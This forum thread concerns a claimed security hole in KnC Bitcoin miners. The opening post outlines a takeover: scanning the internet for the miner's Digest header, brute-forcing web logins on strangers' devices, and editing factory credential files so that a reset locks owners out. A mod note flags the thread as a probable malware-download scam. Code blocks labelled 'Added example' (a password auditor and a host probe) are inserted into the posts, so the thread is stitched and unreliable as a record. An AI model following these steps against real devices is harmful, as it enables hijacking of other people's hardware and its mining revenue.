Bitcoin Forum
May 13, 2024, 08:01:51 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
Author Topic: KnC Miner : Security hacked - UPDATE with TOOL admin remove plz  (Read 25811 times)
steve15 (OP)
December 30, 2013, 08:50:23 PM
Last edit: February 09, 2014, 08:50:58 PM by MiningBuddy
 #1

Mod note: This is probably an elaborate scam to trick you into downloading malware https://bitcointalk.org/index.php?topic=392166.msg4807591#msg4807591 You should still not expose miners to public internet though

EDIT: SEE PAGE 5 FOR MY PROOF OF CONCEPT APPLICATION
Hi all,

So, what else to do in my spare time while mining some BTC? Exploiting security holes in my hardware.
It turns out that every KnC miner can be hacked within 5-10 minutes, making it possible to control the CGMiner remotely.

I've submitted a highly detailed report to KnC, explaining how I did it, and how they can patch it with a new firmware upgrade.
To avoid a huge breach, I will not reveal all details, but I give you a short summary [proof of concept].

1: Scan the internet, using a special tool, for the default KnC Miner header response
Code:
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"

EVERY miner uses this header, so in 10 seconds, I found about 1180 responses vulnerable to my attack.

2: Critical information remains hidden from the public, but the HTTP digest can be bypassed with ease.

3: Run basic HTTP bruteforce. Since the digest is bypassed, I can run unlimited bruteforce attempts.
Within a timespan of 20 minutes, I managed to bruteforce 28 miners !! (Most of them poor passwords though)

Now comes the fun part...

Login using SSH. If the SSH port is not enabled, simply log in to the web console and enable it.

The source code of
Code:
factory_config_reset.sh
tells us exactly what we need.

VI (edit) the default factory files, as found in the factory reset code, making a second login inside the factory reset files.

The digest file requires a special hash to create the password. This can be done using special tools, but for safety reasons, I will not go further on this part in public.

Alter these files to gain access after factory reset

Code:
/etc/shadow.factory
Code:
/etc/lighttpd.htdigest.user

Now remove all the default credentials in the factory files, making it impossible for the owner to log in using the default admin:admin

RUN THE FACTORY RESET...

And enjoy your personal miner, which just became unusable to the owner, since he can no longer log in.

Disclaimer:

I intend to do no harm. No miner has ever been in my control, or ever will be. I just expose this threat to put pressure on KnC to hurry their firmware upgrade.
Do not ask or PM me for information about this hack, it will not be provided !! Only KNC has the entire manual !


Note to all KnC miners out there: Please change your passwords to long, safe passwords!
If needed, simply hashing your firstname to MD5 will do the trick to scare away hackers.

PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!


Greetings!!

EDIT: Email to KnC

Quote
Hello KnC team,

As you might have picked up on bitcointalk.org, I managed to successfully scan and exploit the KnC Miner configuration software running on all your miners.
Attached is my HowTo, showing you how I managed to succeed in this hack.

I feel, as a software developer and penetration tester, that you do not take user security into account with your services.
The only thing you care about is selling hardware. What happens with it seems to be the least of your concerns.

You should know that the user is always the weakest link in security, but instead of anticipating that, you go with the flow.

I did not post exactly how I did it on the forum for security reasons; however, I urge you to push a new firmware closing up those holes.
Holidays or not, I will expose the detailed HowTo on bitcointalk.org on January 1st 2014 at 12h00.

Once this exploit goes public, you will receive a lot of complaints on behalf of your clients, and lose lots of trust in the general public.
If you have not patched your firmware, this will confirm my statement that you do not care about user security.

I can only imagine all blogs picking up that post just before Neptune delivery...

I just created a custom firmware patching all the security flaws; it took me about one hour.
So surely, your developers can do the trick also.

For the sake of the general public, who have put their trust and funds in you, please patch up your firmware!!

EDIT: SEE PAGE 5 FOR MY PROOF OF CONCEPT APPLICATION



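The two files the post names, /etc/shadow.factory and /etc/lighttpd.htdigest.user, are where the default admin:admin login lives, and the second one is easy to audit yourself. The following is an added example, not code from the post or from KnC: it relies on the standard htdigest layout that lighttpd's mod_auth reads (one `user:realm:HA1` line per account, with HA1 = MD5 of `user:realm:password`) and on the realm string and admin:admin default quoted in the thread. The sample file contents and the word list are constructed for the example.

```python
"""Audit a lighttpd htdigest file for default or guessable passwords.

Added example, not code from the original post or from KnC. It relies on
the standard htdigest layout that lighttpd's mod_auth reads
(user:realm:HA1 with HA1 = MD5("user:realm:password")); the realm string
and the admin:admin factory default come from the thread. The sample
file contents and the word list below are constructed for the example.
"""
import hashlib
from typing import Dict, List, Tuple

KNC_REALM = "KnC Miner configuration"


def ha1(user: str, realm: str, password: str) -> str:
    """HA1 as stored in an htdigest file: unsalted MD5 of user:realm:password."""
    return hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()


def parse_htdigest(text: str) -> List[Tuple[str, str, str]]:
    """Parse user:realm:HA1 lines, skipping blanks and '#' comments."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        # user and realm may not contain ':' in this format, so exactly 3 fields
        if len(parts) != 3 or len(parts[2]) != 32:
            raise ValueError(f"line {lineno}: not a user:realm:HA1 entry")
        entries.append((parts[0], parts[1], parts[2].lower()))
    return entries


def audit(text: str, candidates: List[str]) -> Dict[str, str]:
    """Return {user: password} for each entry whose HA1 matches a guess.

    The username itself is tried first, then the candidate list: this is
    what the first seconds of a remote brute force would try as well.
    """
    hits: Dict[str, str] = {}
    for user, realm, digest in parse_htdigest(text):
        for guess in [user] + candidates:
            if ha1(user, realm, guess) == digest:
                hits[user] = guess
                break
    return hits


def htdigest_line(user: str, realm: str, password: str) -> str:
    """Build a replacement entry once a strong password has been chosen."""
    return f"{user}:{realm}:{ha1(user, realm, password)}"


# Constructed sample of what /etc/lighttpd.htdigest.user could hold on a
# miner that still carries the factory admin:admin entry next to one
# account with a long passphrase (both digests computed here).
SAMPLE_FILE = "\n".join([
    "# constructed for the example",
    htdigest_line("admin", KNC_REALM, "admin"),
    htdigest_line("ops", KNC_REALM, "correct horse battery staple 7"),
])

WEAK_WORDS = ["admin", "password", "123456", "miner", "bitcoin", "knc"]

if __name__ == "__main__":
    for user, guess in audit(SAMPLE_FILE, WEAK_WORDS).items():
        print(f"WEAK: {user!r} authenticates with {guess!r}")
```

Run `audit()` over the contents of /etc/lighttpd.htdigest.user and over whatever factory copy the reset script restores, so a reset cannot bring admin:admin back. Because HA1 is an unsalted MD5, anyone who can read the file, or who knows the realm from the header, can test guesses offline at full speed; a password derived from a name or a short word is still a dictionary entry, so the fix is a long random password and an interface that is not reachable from the public internet.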
ArpFlush
December 30, 2013, 09:30:43 PM
 #2

I don't have a KnC but thank you for the info. Other miners may be vulnerable too, and a really good password is a must. I'm not a network expert, but hiding your miner hardware behind a router is a great idea IMHO. So thanks ;)
kano
December 30, 2013, 09:34:00 PM
 #3

... API ...

1l1l11ll1l
December 30, 2013, 10:45:31 PM
 #4

And everyone thought this was HashFast, well played OP!


Soros Shorts
December 31, 2013, 09:44:32 AM
 #5




PLEASE USE A ROUTER INSTEAD OF DIRECT INTERNET ACCESS !!!


It also goes without saying that you should not use port forwarding direct to the miner (for remote access) when using a router. I have heard of some people doing this. Best to use some kind of intermediate jump box that can be locked down more securely than the beagle bone.
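The quickest way to confirm the advice above is to look at your own public address from the outside and see whether the miner's configuration page answers. The following is an added example, not code from the thread or from KnC: the Digest challenge line is the one quoted in post #1, `parse_challenge()` handles the general RFC 2617 `WWW-Authenticate` parameter syntax, and `probe()` is an assumed helper that sends one request to a host and port you name, intended for your own address to verify that no port forward reaches the BeagleBone.

```python
"""Identify whether an address exposes the KnC Miner web configuration UI.

Added example, not from the original thread. SAMPLE_HEADER is the
challenge quoted in post #1; parse_challenge() handles the RFC 2617
WWW-Authenticate parameter syntax generally. probe() is an assumed
helper: point it at your own public address from outside your network
to confirm that no port forward reaches the miner.
"""
import http.client
import re
from typing import Dict, Optional

KNC_REALM = "KnC Miner configuration"

# Header value as quoted in the thread (used as the offline sample).
SAMPLE_HEADER = ('Digest realm="KnC Miner configuration", '
                 'nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"')

# key="quoted value" or key=token, separated by commas and optional whitespace
_PARAM = re.compile(r'(\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^\s,]+))')


def parse_challenge(header: str) -> Dict[str, str]:
    """Split a WWW-Authenticate value into {'scheme': ..., param: value}."""
    scheme, _, rest = header.strip().partition(" ")
    params = {"scheme": scheme}
    for match in _PARAM.finditer(rest):
        key, quoted, bare = match.groups()
        params[key.lower()] = quoted if quoted is not None else bare
    return params


def is_knc_config_ui(header: Optional[str]) -> bool:
    """True only for a Digest challenge carrying the KnC configuration realm."""
    if not header:
        return False
    params = parse_challenge(header)
    return params["scheme"].lower() == "digest" and params.get("realm") == KNC_REALM


def probe(host: str, port: int = 80, timeout: float = 3.0) -> Optional[str]:
    """Request '/' and return the WWW-Authenticate header on a 401, else None.

    None also covers closed or filtered ports, which is the result you want
    when checking your own public address.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/")
        resp = conn.getresponse()
        if resp.status != 401:
            return None
        return resp.getheader("WWW-Authenticate")
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        header = probe(sys.argv[1])
        print("KnC configuration UI exposed" if is_knc_config_ui(header)
              else "no KnC configuration UI on port 80")
    else:
        print(parse_challenge(SAMPLE_HEADER))
```

If the check reports the realm on your public address, the fix is the one already given in the thread: remove the port forward and reach the miner through the LAN or a jump box, not by changing only the password.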
vpasic
December 31, 2013, 10:52:39 AM
 #6


LMFAO!!!

traiz
December 31, 2013, 02:53:16 PM
 #7

Quote from: steve15 (OP), December 30, 2013, 08:50:23 PM
[post #1 quoted in full; see above]


Aren't the details already public?
Correct me if I'm wrong, but aren't you in effect trying to create a custom rom like bertmod?
The hash information is already out there...
steve15 (OP)
December 31, 2013, 03:15:37 PM
 #8

No, the details are not public yet.
There is a significant difference between making a custom ROM and explaining how you can gain access to thousands of remote miners out there.

A custom ROM is intended for use on your own hardware.

My hack is intended to remotely control another miner, making it useless to the owner, since he can no longer log in.

traiz
December 31, 2013, 03:23:15 PM
 #9

No, the details are not public yet.
There is a significant difference between making a custom ROM and explaining how you can gain access to thousands of remote miners out there.

A custom ROM is intended for use on your own hardware.

My hack is intended to remotely control another miner, making it useless to the owner, since he can no longer log in.

Ok.
But I just wanted to check it's different from brute-forcing the credentials of the remote miner
and loading your custom ROM on it.

And I would like to confirm that a true factory reset (not software, but the physical hold for 5 seconds to load the image from ROM, etc.)
is unable to restore the miner to its default.
steve15 (OP)
December 31, 2013, 03:30:42 PM
 #10

No, the details are not public yet.
There is a significant difference between making a custom ROM and explaining how you can gain access to thousands of remote miners out there.

A custom ROM is intended for use on your own hardware.

My hack is intended to remotely control another miner, making it useless to the owner, since he can no longer log in.

Ok.
But I just wanted to check it's different from brute-forcing the credentials of the remote miner
and loading your custom ROM on it.

And I would like to confirm that a true factory reset (not software, but the physical hold for 5 seconds to load the image from ROM, etc.)
is unable to restore the miner to its default.

Code:
DESCRIPTION = "Daemon to monitor power button"
LICENSE = "GPL"
LIC_FILES_CHKSUM = "file://COPYING;md5=d41d8cd98f00b204e9800998ecf8427e"

SRC_URI = "file://monitor-pwbtn.c \
        file://init \
        file://factory_config_reset.sh \
        file://COPYING \
"

S = "${WORKDIR}"

do_compile() {
        make monitor-pwbtn
}

do_install() {
        install -d ${D}${bindir}
        install -m 0755 ${WORKDIR}/monitor-pwbtn ${D}${bindir}
        install -m 0755 ${WORKDIR}/factory_config_reset.sh ${D}${bindir}

        install -d ${D}${sysconfdir}/init.d
        install -m 0755 ${WORKDIR}/init ${D}${sysconfdir}/init.d/monitor-pwbtn
        update-rc.d -r ${D} monitor-pwbtn start 70 S .
}

A 'true' factory reset does exactly the same on the software level as a 'software' factory reset ;)
Just some minor details change: the miner connects to a KnC server to get some info, that's it.

philipma1957
December 31, 2013, 04:09:14 PM
 #11

Quote from: steve15 (OP), December 30, 2013, 08:50:23 PM
[post #1 quoted in full; see above]


Quite frankly, after reading this I think you owe coins to us on this thread:

https://bitcointalk.org/index.php?topic=334360.0

I believe you screwed up our 2 miners;
we have a 2-3 day coinless gap

https://blockchain.info/address/19NAwha8LGpRFEBwRgjH5ZMB9YyXeqyY9V

https://blockchain.info/address/13fGQGmb6Xi576ppJTkeXk34yDDRmvxjm4

(Eleuthria)
This direct appeared on both our payout addresses and we lost coins. The timing matches your playing around with our 2 miners along with 1100 other miners.

steve15 (OP)
December 31, 2013, 04:20:00 PM
 #12


Quite frankly, after reading this I think you owe coins to us on this thread:

https://bitcointalk.org/index.php?topic=334360.0

I believe you screwed up our 2 miners;
we have a 2-3 day coinless gap

https://blockchain.info/address/19NAwha8LGpRFEBwRgjH5ZMB9YyXeqyY9V

https://blockchain.info/address/13fGQGmb6Xi576ppJTkeXk34yDDRmvxjm4

(Eleuthria)
This direct appeared on both our payout addresses and we lost coins. The timing matches your playing around with our 2 miners along with 1100 other miners.


Quote
I intend to do no harm. No miner has ever been in my control, or ever will be.

Why should I screw with 2 miners, while I have 6 Jupiters standing here?
Also, why screw with miners that are password protected, while there are hundreds of miners with the default login?

And mostly, why would I post a topic after screwing with miners?

Think about it ;-)

philipma1957
December 31, 2013, 04:56:54 PM
 #13

I did think about it. I found it to be bad timing on your part to announce you did this, and that the announcement matches very odd behaviour of our miners. What I would like to know is how many miners other than the two mentioned have this problem, which is why I posted this here. You have admitted you viewed 1100 plus miners. If only the two I mention have this problem after being viewed by you, then most likely this has nothing to do with your testing.

steve15 (OP)
December 31, 2013, 05:02:00 PM
 #14

I did think about it. I found it to be bad timing on your part to announce you did this, and that the announcement matches very odd behaviour of our miners. What I would like to know is how many miners other than the two mentioned have this problem, which is why I posted this here. You have admitted you viewed 1100 plus miners. If only the two I mention have this problem after being viewed by you, then most likely this has nothing to do with your testing.

Well, just wait until the post goes public then! Hurry up and push KnC to patch up.
Can you imagine the horror once I post the full details?

For your information: the 1100+ miners are publicly available on the net; everybody can scan and see them.
I bruteforced 28 logins, but I never actually logged in. Don't you know your KnC has a log? CHECK YOUR LOG BEFORE THROWING MUD!!!

Bogart
December 31, 2013, 05:22:13 PM
 #15

Of course this kind of thing is a risk if you use a weak password and then forward the ports to allow incoming connections directly from the big bad internet.  Duh.  This goes for any device.
philipma1957
December 31, 2013, 06:08:52 PM
 #16

I did think about it. I found it to be bad timing on your part to announce you did this, and that the announcement matches very odd behaviour of our miners. What I would like to know is how many miners other than the two mentioned have this problem, which is why I posted this here. You have admitted you viewed 1100 plus miners. If only the two I mention have this problem after being viewed by you, then most likely this has nothing to do with your testing.

Well, just wait until the post goes public then! Hurry up and push KnC to patch up.
Can you imagine the horror once I post the full details?

For your information: the 1100+ miners are publicly available on the net; everybody can scan and see them.
I bruteforced 28 logins, but I never actually logged in. Don't you know your KnC has a log? CHECK YOUR LOG BEFORE THROWING MUD!!!


So you attacked 28 logins of the 1100 plus miners and you were successful with them. Your words, not mine. You claim to own 2 machines, so at best 26 miners are not yours. Did you get permission to try them? So how do I know if one or both of the machines I own shares in were not damaged by you?

Causing them to lose about .5btc each in hash. Look, if no one comes to the thread other than me then maybe the 28 machines you hacked were not injured in terms of hash power. But announcing to the world that you hacked/brute forced 28 machines puts you at risk for damages. Anyone, including me and my 9.5 percent share of 2 Jupiters (about 100gh), can say your actions caused them harm. Frankly I am posting this here to say that brute forcing someone's password without permission is not too clever in terms of liability.

Can you prove the 28 machines that were brute forced were not damaged? Can you prove you did not attack the machines I own a piece of? Most people do not realize that for civil damage the proof is not as high as it is for criminal damage. So I am not slinging any mud; I am pointing out that you may have set yourself up for problems. You should have asked for 30 KnC owners to be testers.

If you had permission to do a brute force attack on the 28 machines you should have told us that right up front.

soothaa
December 31, 2013, 06:09:34 PM
 #17

I did think about it. I found it to be bad timing on your part to announce you did this, and that the announcement matches very odd behaviour of our miners. What I would like to know is how many miners other than the two mentioned have this problem, which is why I posted this here. You have admitted you viewed 1100 plus miners. If only the two I mention have this problem after being viewed by you, then most likely this has nothing to do with your testing.
Holy shit, the entitlement here!

philipma1957
December 31, 2013, 06:13:14 PM
 #18

I did think about it. I found it to be bad timing on your part to announce you did this, and that the announcement matches very odd behaviour of our miners. What I would like to know is how many miners other than the two mentioned have this problem, which is why I posted this here. You have admitted you viewed 1100 plus miners. If only the two I mention have this problem after being viewed by you, then most likely this has nothing to do with your testing.
Holy shit, the entitlement here!

No, not about entitlement. He admits to attacking passwords of 28 miners, and in no place does he say he had permission. The 2 miners I own 9.5% of had a hashing issue during the time he was brute forcing miners.

If I go to a gym locker and try a 3 digit combo lock 20 times a day until it clicks open, I am breaking the law in most countries, even if I push it locked again.

The OP admits to doing this with KnC passwords. So dude, this is not about entitlement. This is about the OP admitting to attacking passwords on valuable gear. I am not the OP. I am a part owner of 2 machines that the OP may have attacked. So 28/1100 = 2.5% chance, but I have 2 machines, so about a 5% chance he tried on my gear. My gear had an unexplained loss of hash power. What do you expect me to think?

runderwo
December 31, 2013, 06:49:55 PM
 #19

what do you expect me to think?

That you should have some evidence beyond pure circumstance before slinging around legal threats?

Would you somehow have been better off if OP had been intimidated by legal liabilities into never discovering and posting this information?

P.S. If you don't want people "attacking" your gear through a public IP interface, simply configure it to not fulfill requests so promptly and politely.  Is it that difficult?
philipma1957
December 31, 2013, 07:03:59 PM
 #20

what do you expect me to think?

That you should have some evidence beyond pure circumstance before slinging around legal threats?

Would you somehow have been better off if OP had been intimidated by legal liabilities into never discovering and posting this information?

P.S. If you don't want people "attacking" your gear through a public IP interface, simply configure it to not fulfill requests so promptly and politely.  Is it that difficult?

First off, I am not the OP. I did not brute force 28 KnC machines; he did. Now, when he did the brute force on the 28 machines he did not tell us he had permission to do it. So stop defending him for doing something that is not legal.

Did his brute force attack hurt this person?

https://bitcointalk.org/index.php?topic=31163.msg4140767#msg4140767

Maybe; I do not know, but time wise it matches. Was he off line for 3 or 5 hours extra due to the password attack? I do not know. I ask you this: would you want someone coming to the front door of your home and testing your door knob to see if it opens easily?

So to the OP: did you have permission to attack the 28 machines? Yes or no? My apologies if you informed those miners before you attacked them.

Darkhand
December 31, 2013, 09:24:09 PM
 #21

No logs posted, just a troll.  Post logs and everyone will be on your side.  Take your pick!
traiz
December 31, 2013, 09:49:33 PM
 #22

what do you expect me to think?

That you should have some evidence beyond pure circumstance before slinging around legal threats?

Would you somehow have been better off if OP had been intimidated by legal liabilities into never discovering and posting this information?

P.S. If you don't want people "attacking" your gear through a public IP interface, simply configure it to not fulfill requests so promptly and politely.  Is it that difficult?

First off, I am not the OP. I did not brute force 28 KnC machines; he did. Now, when he did the brute force on the 28 machines he did not tell us he had permission to do it. So stop defending him for doing something that is not legal.

Did his brute force attack hurt this person?

https://bitcointalk.org/index.php?topic=31163.msg4140767#msg4140767

Maybe; I do not know, but time wise it matches. Was he off line for 3 or 5 hours extra due to the password attack? I do not know. I ask you this: would you want someone coming to the front door of your home and testing your door knob to see if it opens easily?

So to the OP: did you have permission to attack the 28 machines? Yes or no? My apologies if you informed those miners before you attacked them.

Wait... the OP is kind enough to inform us of a possible exploit and you're nailing him for it???
I'd rather this type of information is made public than kept under wraps and have "hackers" exploit it.

Besides, if you have a machine directly connected to the internet, you should sort of expect something like this to happen.

I mean, if someone had remote access to your machine, locking you out should be the least of your concerns (since you would know something was wrong).
Instead, they could have reflashed your machine with a custom ROM whose GUI looks exactly like the standard KnC one, but is set to mine for them on a part-time basis (but also keeps your settings as well).
Then you're paying resources to mine for them, all the while thinking your miner was defective/had stale shares, not knowing it's compromised.

It's even worse if they had it randomly mine for them on one of the larger pools (that only requires an address), say like 2am to 6am, 10am to 12pm, then 2pm to 4pm, while occasionally submitting shares to your pools so it doesn't time out and alert you.

Then again, if this was a troll post, good job.
You got me.
Tigggger (Legendary)
December 31, 2013, 11:47:14 PM
 #23

Wait... the OP is kind enough to inform us of a possible exploit and you're nailing him for it???
I'd rather this type of information is made public than kept under wraps and have "hackers" exploit it.

My thoughts exactly, thank you OP for doing the honourable thing and giving users a chance to lock down their machines before someone less honest found it.

astutiumRob (Full Member)
January 01, 2014, 01:52:13 AM
 #24

Well, it's either the OP or someone following their instructions ...

Have helped a couple of colo clients with hacked KNC kit today.

At least one of the brute-force attacks is coming from
109.201.154.184

Investigation into one hacked miner shows 1J7PH3SSzMLgrGZEkjQbq6Ls5LjQwpkAGq
http://eligius.st/~wizkid057/newstats/userstats.php/1J7PH3SSzMLgrGZEkjQbq6Ls5LjQwpkAGq
being used - and that's had a *huge* hashrate increase today



timmmers (Sr. Member)
January 01, 2014, 03:49:09 AM
 #25

Thanks to the OP for the warning, hopefully no-one lost due to this. Got to say that it's a fairly obvious target for anyone with the skills and the mindset to try this eventually.
Could have been worse, could have been 2 months ago by someone sensible enough not to be greedy and milk a lot of rigs a little each day.
Posting ANY details was a bit "look at me" though, no need for that here; just warn KnC and advise the PW changes needed etc.

As for the rigs mentioned that seem to have lost some hashing, if they are on Slush there was a problem recently where earnings were deducted or some such nonsense which may account for that... which has been remedied now.

steve15 (OP) (Member)
January 01, 2014, 12:50:54 PM
 #26

Yes, well, posting ANY DETAILS should put the pressure on KnC to patch up their firmware.

To the person claiming I hacked their rig: I bruteforced 28 miners in under 20 minutes, that's about 50 seconds/miner.
What are you complaining about, 3 hours of inactivity for your miner?

Second of all, your HTTP is separated from the mining activity itself. Even if I bruteforce your miner for 24h, you'll never notice this.

Third of all, POST SOME LOGS THEN!!! That's what logs are made for anyway.

Last but not least, if I DID hack your machine, it would not even be visible to you.

I am not a 15yr old scriptkiddie trying to hack into every account I see.
I'm a 30+ professional security penetration tester.

But fine by me, next time I'll post nothing, and get your rigs hacked then.
Underground is already offering me +150 BTC for all details, be glad I keep it to myself instead of thinking I would hack your lame rig with almost no profit according to your blockchain....

Bitcoin is about the community. That's why I keep this public and not underground, so all users can patch up before massive attacks start!
Or are you so naive to think I'm the only one who can discover this...

philipma1957 (Legendary)
January 01, 2014, 01:18:43 PM
 #27

Yes, well, posting ANY DETAILS should put the pressure on KnC to patch up their firmware.

To the person claiming I hacked their rig: I bruteforced 28 miners in under 20 minutes, that's about 50 seconds/miner.
What are you complaining about, 3 hours of inactivity for your miner?

Second of all, your HTTP is separated from the mining activity itself. Even if I bruteforce your miner for 24h, you'll never notice this.

Third of all, POST SOME LOGS THEN!!! That's what logs are made for anyway.

Last but not least, if I DID hack your machine, it would not even be visible to you.

I am not a 15yr old scriptkiddie trying to hack into every account I see.
I'm a 30+ professional security penetration tester.

But fine by me, next time I'll post nothing, and get your rigs hacked then.
Underground is already offering me +150 BTC for all details, be glad I keep it to myself instead of thinking I would hack your lame rig with almost no profit according to your blockchain....

Bitcoin is about the community. That's why I keep this public and not underground, so all users can patch up before massive attacks start!
Or are you so naive to think I'm the only one who can discover this...

Okay, I call myself jaded and suspicious. Thanks for your efforts to warn us.

padrino (Legendary)
January 01, 2014, 02:23:52 PM
 #28

Yes, well, posting ANY DETAILS should put the pressure on KnC to patch up their firmware.

To the person claiming I hacked their rig: I bruteforced 28 miners in under 20 minutes, that's about 50 seconds/miner.
What are you complaining about, 3 hours of inactivity for your miner?

Second of all, your HTTP is separated from the mining activity itself. Even if I bruteforce your miner for 24h, you'll never notice this.

Third of all, POST SOME LOGS THEN!!! That's what logs are made for anyway.

Last but not least, if I DID hack your machine, it would not even be visible to you.

I am not a 15yr old scriptkiddie trying to hack into every account I see.
I'm a 30+ professional security penetration tester.

But fine by me, next time I'll post nothing, and get your rigs hacked then.
Underground is already offering me +150 BTC for all details, be glad I keep it to myself instead of thinking I would hack your lame rig with almost no profit according to your blockchain....

Bitcoin is about the community. That's why I keep this public and not underground, so all users can patch up before massive attacks start!
Or are you so naive to think I'm the only one who can discover this...

I'm glad you posted about the issue and think it's good to make the community aware of it, but as a professional penetration tester (since you keep bringing it up) I would think you would follow industry best practices and not post the technical details in your initial posting, but give the vendor time to address the issue.

In addition to that, it's not even a hack, but a weakness in a vanilla vendor configuration putting users at risk.

I think you have the best intentions in mind, but you are not conducting yourself as professionally as you could, especially given your career...

steve15 (OP) (Member)
January 01, 2014, 02:37:12 PM
 #29

I'm glad you posted about the issue and think it's good to make the community aware of it, but as a professional penetration tester (since you keep bringing it up) I would think you would follow industry best practices and not post the technical details in your initial posting, but give the vendor time to address the issue.

In addition to that, it's not even a hack, but a weakness in a vanilla vendor configuration putting users at risk.

I think you have the best intentions in mind, but you are not conducting yourself as professionally as you could, especially given your career...

Since KnC does not reply when I attempt to warn them, the best way to bring things to their attention is by involving the users/owners/customers.

The information I posted here is nothing more than public source information as shown on their own GitHub page.

Believe me, no critical information is displayed on this forum. The information provided here is useless to so-called 'hackers' trying to abuse miners.
If all the details that I supplied to KnC are leaked, all public online miners are hacked within a 2-hour timespan.

I'm not looking to receive credits, badges or rewards for this exploit. I just want to prevent a massive miner attack.

padrino (Legendary)
January 01, 2014, 02:49:42 PM
 #30

I'm glad you posted about the issue and think it's good to make the community aware of it, but as a professional penetration tester (since you keep bringing it up) I would think you would follow industry best practices and not post the technical details in your initial posting, but give the vendor time to address the issue.

In addition to that, it's not even a hack, but a weakness in a vanilla vendor configuration putting users at risk.

I think you have the best intentions in mind, but you are not conducting yourself as professionally as you could, especially given your career...

Since KnC does not reply when I attempt to warn them, the best way to bring things to their attention is by involving the users/owners/customers.

The information I posted here is nothing more than public source information as shown on their own GitHub page.

Believe me, no critical information is displayed on this forum. The information provided here is useless to so-called 'hackers' trying to abuse miners.
If all the details that I supplied to KnC are leaked, all public online miners are hacked within a 2-hour timespan.

I'm not looking to receive credits, badges or rewards for this exploit. I just want to prevent a massive miner attack.

Fair enough, apologies for jumping too quickly on it... A quick glance at your first post indicated enough was available; didn't realize it was missing some things...

bitnpieces (Newbie)
January 01, 2014, 03:30:36 PM
 #31

Wow, I can't believe some people are jumping down your throat. I think you have done a great service to these guys by finding and highlighting these risks.
af_newbie (Legendary)
January 01, 2014, 04:28:47 PM
 #32

Hi all,

So, what else to do in my spare time while mining some BTC? Exploiting security holes in my hardware.
It turns out that every KnC miner can be hacked within 5-10 minutes, making it possible to control the CGMiner remotely.

I've submitted a highly detailed report to KNC, explaining how I did it, and how they can patch it with a new firmware upgrade.
To avoid a huge breach, I will not reveal all details, but I give you a short summary [proof of concept].

1: Scan the internet, using a special tool, for the default KnC Miner header response
Code:
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="f76e06a34c00b5fec1da6749d4ed0bfc", qop="auth"

EVERY miner uses this header, so in 10 seconds, I found about 1180 responses vulnerable to my attack.

Don't use Internet to access your miners directly. 

Use some sort of API aggregation web page (https) to list status of all miners, restart them or power cycle them.  Protect that page with user login and https.
Port forward your Internet connections to that page.


steve15 (OP) (Member)
January 01, 2014, 06:41:17 PM
 #33

Wow, I can't believe some people are jumping down your throat. I think you have done a great service to these guys by finding and highlighting these risks.


Thank you sir!

kano (Legendary)
January 01, 2014, 09:21:48 PM
 #34

...
Don't use Internet to access your miners directly. 

Use some sort of API aggregation web page (https) to list status of all miners, restart them or power cycle them.  Protect that page with user login and https.
Port forward your Internet connections to that page.
cgminer already has all this by default - I wrote it - but no idea if KnC enabled it or not.

af_newbie (Legendary)
January 02, 2014, 04:00:15 AM
 #35

...
Don't use Internet to access your miners directly.  

Use some sort of API aggregation web page (https) to list status of all miners, restart them or power cycle them.  Protect that page with user login and https.
Port forward your Internet connections to that page.
cgminer already has all this by default - I wrote it - but no idea if KnC enabled it or not.

I meant a page like your api-example.php. If you have 10 miners (on 10 different IPs) and one rPi watchdog, on that watchdog have a page that would go
to the 10 IPs and fetch API summaries, format and display. Something like

https://bitcointalk.org/index.php?topic=222632.0

rPi GPIO ports can be used to drive relays (via a simple transistor driver) to power cycle the miners (waiting for my relays to try this).
Got the GPIO ports working (set them on 3.3V/off 0.4V), but not from the web server (requires access to sysfs). Work in progress...

Something like
http://code.google.com/p/raspberrypi-gpio/downloads/list  but it uses MySQL, which is overkill to do this if you ask me.

mostclicked (Newbie)
January 02, 2014, 05:01:41 AM
 #36

OP is not bluffing. I can retrieve the IP addresses of KnC Miners from an available search engine. The IP addresses are removed for security reasons. Search result examples:

Added on 01.01.2014
United States New York
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="354d48be494a88e6eccd16cdc7a1f67d", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Wed, 01 Jan 2014 05:39:41 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
United States Englewood
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="3b7e9df094c80de0a73e05bc14066075", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 22:50:39 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
Netherlands
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="71e7f1f82e328c05cf4d406705270c25", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 20:23:39 GMT
Server: lighttpd/1.4.32
steve15 (OP) (Member)
January 02, 2014, 05:44:07 AM
 #37

OP is not bluffing. I can retrieve the IP addresses of KnC Miners from an available search engine. The IP addresses are removed for security reasons. Search result examples:

Added on 01.01.2014
United States New York
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="354d48be494a88e6eccd16cdc7a1f67d", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Wed, 01 Jan 2014 05:39:41 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
United States Englewood
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="3b7e9df094c80de0a73e05bc14066075", qop="auth"
Content-Type: text/html
Content-Length: 351
Date: Tue, 31 Dec 2013 22:50:39 GMT
Server: lighttpd/1.4.32

Added on 31.12.2013
Netherlands
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Digest realm="KnC Miner configuration", nonce="71e7f1f82e328c05cf4d406705270c25", qop="auth"
Content-Type: text/html
Content-Length: 351
